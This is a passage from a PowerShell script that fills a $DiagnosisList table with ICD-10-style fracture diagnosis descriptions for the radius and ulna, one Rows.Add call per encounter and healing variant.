radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of head of unspecified radius","Displaced fracture of head of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of right radius","Nondisplaced fracture of head of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of left radius","Nondisplaced fracture of head of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of head of unspecified radius","Nondisplaced fracture of head of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right radius","Displaced fracture of neck of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left radius","Displaced fracture of neck of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified radius","Displaced fracture of neck of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right radius","Nondisplaced fracture of neck of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left radius","Nondisplaced fracture of neck of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified radius","Nondisplaced fracture of neck of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of right radius","Other fracture of upper end of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of left radius","Other fracture of upper end of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of upper end of unspecified radius","Other fracture of upper end of unspecified radius, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of shaft of right ulna","Unspecified fracture of shaft of right ulna, initial encounter for open fracture type I or II") + $null = 